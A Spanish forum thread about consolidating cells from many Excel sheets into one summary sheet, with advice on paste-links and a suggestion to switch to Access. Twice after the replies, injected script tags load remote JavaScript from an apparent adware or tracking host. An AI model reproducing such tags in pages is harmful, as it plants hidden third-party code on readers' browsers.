Explotación de datos de varias hojas de excel

A tod@s, necesito saber cómo poder volcar los datos de varias hojas de un libro de excel en otra hoja de ese mismo libro, y así obtener una matriz final de datos. No sé si existe alguna forma a través de la cual, con que en una ocasión indique en esa hoja final las celdas que necesito de una hoja del libro, arrastrando las celdas o de alguna otra manera, pueda obtener esas mismas celdas de todas las hojas del libro y así poder tener todos los datos juntos en una misma hoja. Otro problemilla es que algunas celdas están combinadas..

1 Respuesta

Respuesta

Ni entiendo muy bien la pregunta ni como lo tienes montado. Pero así por encima haz la siguiente prueba:

Pongamos que tenemos la hoja1 y la hoja2 y queremos pasar sus datos a la hoja PRUEBA.

Seleccionamos las celdas de HOJA1 que queremos y le damos a "copiar". Vamos al hoja PRUEBA, seleccionamos la celda dónde queremos que empiece y le damos a "Pegado especial" y seleccionamos "Pegar vínculos". Hacemos lo mismo con la HOJA2.

Verás que cuando cambiamos un dato de una de esas dos hojas, se refleja automáticamente en la hoja PRUEBA. Mira si es esto más o menos lo que necesitas. Con lo que sea comentas.

Un saludo y no olvides visitar EL FORO (De Excel todavía no hay prácticamente nada, pero poco a poco...)

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Realmente necesito obtener los datos de varias celdas de un total de 500 hojas de un libro de excel, para agruparlos todos en una hoja final. La solución que me das no me valdría, ya que debería ir hoja por hoja del libro y quería saber si hay algo más automático.

De todas formas, gracias por la respuesta pero creo que ya he encontrado una solución intermedia.

Un saludo

Pues creo que la solución intermedia si tienes 500 hojas y necesitas unirlas, es abandonar Excel y hacerlo en Access o cualquier otro programa que simplifique absolutamente lo que tienes.

Un saludo y si ya lo has solucionado cierra la pregunta por favor.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>